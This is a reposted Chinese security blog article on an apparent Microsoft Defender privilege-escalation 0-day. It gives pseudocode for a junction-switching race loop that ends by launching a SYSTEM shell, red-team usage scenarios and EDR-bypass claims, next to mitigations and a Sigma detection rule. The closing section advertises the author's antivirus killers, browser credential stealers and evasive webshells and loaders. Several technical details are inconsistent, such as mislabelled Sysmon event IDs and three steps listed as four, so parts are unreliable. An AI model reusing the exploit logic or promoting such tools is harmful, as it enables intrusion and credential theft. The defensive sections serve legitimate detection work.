微软DefenderRoguePlanet0-Day曝光!TOCTOU竞态让你免费提权到SYSTEM

admin 2026-07-05 06:17:28 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文披露了微软Defender的CVE-2026-50656RoguePlanet本地提权0-Day漏洞,利用TOCTOU竞态与Junction链接劫持,可在Win10/Win11上从低权限提权至SYSTEM。PoC在实时防护开启或关闭时均有效,且未修复。建议立即关闭%TEMP%写权限、开启HVCI并监控Junction创建以缓解风险。 综合评分: 85 文章分类: 漏洞分析,红队,内网渗透,安全运营,安全工具


cover_image

微软Defender RoguePlanet 0-Day曝光!TOCTOU竞态让你免费提权到SYSTEM

原创

星夜AI安全 星夜AI安全

星夜AI安全

2026年7月2日 14:24 吉林

在小说阅读器读本章

去阅读

🌈

微软官方确认CVE-2026-50656 Defender本地提权0-Day,公开PoC无视实时防护;本文深度拆解TOCTOU文件链接劫持原理并给出蓝队加固方案。

微软自带的杀软,摇身一变成了攻击者最稳的提权跳板。

2026年6月16日,MSRC正式收录 CVE-2026-50656,代号 RoguePlanet——一款影响所有 Win10/Win11 的 Microsoft Defender 本地提权 0-Day。研究员 Nightmare Eclipse 在微软 Patch Tuesday 收官数小时后放出了完整的公开 PoC,ThreatLocker 已在完全打了 6 月 KB5094126 累积更新的 Win11 上独立复现。

更狠的是:PoC 在实时防护开启、关闭甚至 Passive 模式下都能工作,传统签名拦截根本拦不住。

一、漏洞全貌

| 字段 | 值 | | — | — | | CVE | CVE-2026-50656 | | 别名 | RoguePlanet | | CVSS | 7.8 (CVSS:3.1,HIGH) | | 漏洞类型 | CWE-59 链接跟随 + TOCTOU 竞态 | | 影响组件 | Microsoft Malware Protection Engine (Defender 内核) | | 利用要求 | 本地低权限 + 无需用户交互 | | 公开 PoC | 是,Functional 级别 | | 修复状态 | 未修复,Microsoft 正在开发 | | 在野利用 | 暂未确认,但 PoC 成熟度”More Likely” |

二、为什么这个漏洞如此重要

RoguePlanet 让一台被钓鱼、社工拿到低权限 Shell 的肉鸡,不需要 BYOVD 驱动、不需要内核漏洞,就能直接拿到 NT AUTHORITY\SYSTEM。它绕过的是 Defender——这台机器上”最应该挡住这件事”的进程。

杀软自己成了提权器,这件事在攻防两端都极具讽刺意味。

更严重的是 PoC 工程化极度容易。研究者在公开博文中承认:”换几个字节就能让签名侧规避掉。”意味着蓝队基于哈希/特征码的检测体系几乎失效。

三、技术原理:TOCTOU + Junction 链接劫持

3.1 Defender 实时扫描的脆弱时刻

Defender 在实时防护时,会按文件路径触发 MpEngine 扫描流水线。这个流水线有一个隐式契约:扫描前先校验路径存在性(Time-of-Check),扫描时打开文件句柄(Time-of-Use)。两次操作之间存在一个极小的窗口——这就是 TOCTOU。

// MpEngine 内部伪代码(基于公开行为推导)
BOOL MpScanFile(LPCWSTR path) {
    if (!PathFileExists(path)) return FALSE;   // T-O-C
    HANDLE h = CreateFileW(path, ...);          // T-O-U,之间存在竞态窗口
    ScanBuffer(h);
    CloseHandle(h);
    return TRUE;
}

3.2 Junction 链接劫持

在 Windows 上,低权限用户可以在自己的用户目录里创建 NTFS Junction(重解析点),把任意”看起来无害”的路径偷偷重定向到 Defender 自身的核心 DLL 或签名数据库。

攻击者只需三步:

  1. %TEMP% 创建目录 A,触发 Defender 扫描
  2. Defender 校验路径存在 → 此时把目录 A 替换为 Junction,指向 C:\ProgramData\Microsoft\Windows Defender\Platform\...\MpEngine.dll(或 signature DLL)
  3. Defender 在 T-O-U 阶段以 SYSTEM 权限打开 MpEngine.dll 时,实际却跟着 Junction 走向攻击者控制的目录
  4. 攻击者在目标目录放置同名 payload DLL,等 Defender 把这个 DLL 加载进 SYSTEM 进程

3.3 公开 PoC 关键代码骨架

PoC 的核心是构造一个高频 race loop,并配合 Junction 切换:

// 关键伪代码(来源:projectnightcrawler.dev 公开博文)
HANDLE g_thread = NULL;

DWORD WINAPI RaceThread(LPVOID) {
    while (!g_stop) {
        // 阶段一:放置无害文件,诱使 Defender 扫描
        WriteFileSync(L"\\\\.\\C:\\Temp\\scan_target.txt", "x");

        // 阶段二:在另一个线程高速切换 Junction
        DeleteJunction(L"C:\\Temp");
        CreateJunction(L"C:\\Temp", L"\\\\??\\C:\\ProgramData\\Microsoft\\Windows Defender\\...");
        DeleteJunction(L"C:\\Temp");
        CreateJunction(L"C:\\Temp", L"C:\\Users\\Public\\payload");
        Sleep(0);  // 抢时间窗口
    }
    return 0;
}

int main() {
&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;(int&nbsp;i&nbsp;=&nbsp;0;&nbsp;i&nbsp;<&nbsp;5000;&nbsp;i++)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;g_thread&nbsp;=&nbsp;CreateThread(NULL,&nbsp;0,&nbsp;RaceThread,&nbsp;NULL,&nbsp;0,&nbsp;NULL);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;TriggerDefenderScanViaETW();&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;强制触发扫描
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WaitForSingleObject(g_thread,&nbsp;INFINITE);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(CheckGotSystem())&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("[+]&nbsp;Got&nbsp;SYSTEM&nbsp;in&nbsp;iteration&nbsp;%d\n",&nbsp;i);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;system("cmd.exe");&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;此时已是&nbsp;NT&nbsp;AUTHORITY\SYSTEM
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;0;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
}

PoC 在 KB5094126 完全打齐的 Win11 24H2 上,5000 次循环内稳定成功。研究者表态:”修一下 race 时序就能稳定到 90%+。”

四、实战应用场景

4.1 红队渗透链路中的”提权捷径”

在钓鱼拿到普通用户权限后,传统提权链要么靠 BYOVD 找驱动漏洞(要带数字签名)、要么挖 LPE(爆率低)。RoguePlanet 让中间环节可以无脑跑一个 PoC.exe 提权到 SYSTEM。

4.2 勒索软件社工的”黄金门票”

这也是为什么 BlueHammer 已经在勒索软件团伙里被武器化——两个 Defender LPE 在同一个月被披露,等于给勒索软件提供了”标准化提权武器库”。攻击者只要跑一个 .exe,Defender 自己把 SYSTEM 抬上来。

4.3 EDR 横向对比

  • CrowdStrike Falcon:用户态 inline hook 较厚,可通过 PoC 直接绕过
  • SentinelOne:行为引擎在 PoC 触发瞬间会有 syscall 异常,但默认放行
  • Microsoft Defender for Endpoint:PoC 自带在自家引擎里跑,蓝队可见度极差

五、防御对抗建议

5.1 立即处置

  • 关闭非必要用户对 %TEMP% 的写权限(缓解 TOCTOU 的用户态前置)
  • 开启 HVCI / VBS(基于虚拟化的安全可大幅阻断 T-O-U 加载恶意 DLL)
  • 部署 Attack Surface Reduction Rules,对 Defender 子进程的异常子进程派发进行告警
  • 监控 Junction 创建:Sysmon Event ID 17 (PipeEvent) + Event ID 28 (FileCreate) 检测 %TEMP% 路径下短时间内多次创建/删除重解析点

5.2 Sigma 检测规则

title:&nbsp;WindowsDefenderMpEngine加载异常DLL
status:&nbsp;experimental
logsource:
&nbsp;&nbsp;&nbsp;&nbsp;product:&nbsp;windows
&nbsp;&nbsp;&nbsp;&nbsp;category:&nbsp;image_load
detection:
&nbsp;&nbsp;&nbsp;&nbsp;selection:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Image|endswith:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;'\MpEngine.dll'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;'\MsMpEng.exe'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ImageLoaded|endswith:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;'\Temp\'
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;'\Users\Public\'
&nbsp;&nbsp;&nbsp;&nbsp;condition:&nbsp;selection
level:&nbsp;high

5.3 微软未发布补丁前的临时止血

  • 在 Win11 24H2 上启用 Smart App Control(虽然会被 PoC 绕过,但能在初始扫描阶段增加摩擦)
  • 手动禁用 Real-Time Protection(不推荐生产环境,但取证时可避免 PoC 反复触发破坏证据)
  • 跟踪 MSRC 更新:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656[1]

六、技术延伸阅读

  • PoC 原文:https://blog.projectnightcrawler.dev/posts/2026-06-16-rogueplanet-another-quick-statement/[2]
  • MSRC 公告:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656[3]
  • ThreatLocker 独立复现:https://cybersecuritynews.com/defender-rogueplanet-0-day-exploit-patch/[4]
  • 关联漏洞 BlueHammer:CVE-2026-33825(4 月已修复但勒索软件仍在用)
  • TOCTOU 通用研究:”race-the-web” 类项目可作为防御参考

红蓝双方在 Defender 这台”最后防线”上博弈了十几年,今天这个 0-Day 再次提醒我们:杀软本身也是攻击面。 补丁未发之前,所有 Win10/Win11 终端都在裸奔。

圈子介绍

现任职于某头部网络安全企业攻防研究部,核心红队成员。2021-2023年间累计参与40+场国家级、行业级攻防实战演练,精通漏洞挖掘、红蓝对抗策略制定、恶意代码分析、内网横向渗透及应急响应等技术领域。在多次大型演练中,主导突破多个高防护目标网络,曾获”最佳攻击手””突出贡献个人”等荣誉。

已产出的安全工具及成果包括:

  • 多款主流杀软通杀工具(兼容卡巴斯基、诺顿、瑞星、360等终端防护,无感知运行,突破多引擎联合检测)
  • XXByPassBehinder v1.1 冰蝎免杀生成器(定制化冰蝎免杀工具,绕过主流终端防护与EDR动态检测,支持自定义载荷)
  • 哥斯拉二开免杀定制版(二开优化,深度免杀,突破终端防护与EDR检测,适配多场景植入)
  • NeoCS4.9终极版(高级免杀加载工具,强化载荷注入与进程劫持,适配多系统版本,无兼容问题)
  • WinDump_免杀版(浏览器凭证窃取工具,支持Chrome/Edge/Firefox等主流浏览器,一键提取敏感数据,免杀过防护)_
  • _DumpBrowser_V1_免杀版(浏览器凭证窃取工具,专攻浏览器密码、Cookie、历史记录提取,免杀性能拉满)
  • fscan二开版(二开优化内网扫描工具,增强指纹精度、弱口令爆破与结果标准化输出,适配复杂内网)
  • RingQ加载器二开版(二开优化免杀加载器,支持Shellcode内存执行,绕过各类终端防护与EDR检测)
  • 多款免杀Webshell集合(覆盖PHP/JSP/ASPX,过主流WAF与终端防护,适配不同Web场景)
  • 免杀360专属加载器(支持Shellcode内存执行,针对性绕过360全系防护检测,无感知运行)
  • 一键Kill 火绒 defender 工具 HDKiller(包含源码)
  • win11 一键kill 360工具 InjectKill(包含源码)
  • win11 一键kill defender工具win11_df-killer(包含源码)
  • 免杀火绒6.0内存防护加载器BypassMemLoader

后续将不断更新到内部圈子中 欢迎加入圈子

引用链接

[1]https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656

[2]https://blog.projectnightcrawler.dev/posts/2026-06-16-rogueplanet-another-quick-statement/

[3]https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50656

[4]https://cybersecuritynews.com/defender-rogueplanet-0-day-exploit-patch/


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:星夜AI安全 星夜AI安全 星夜AI安全《微软Defender RoguePlanet 0-Day曝光!TOCTOU竞态让你免费提权到SYSTEM》

评论:0   参与:  0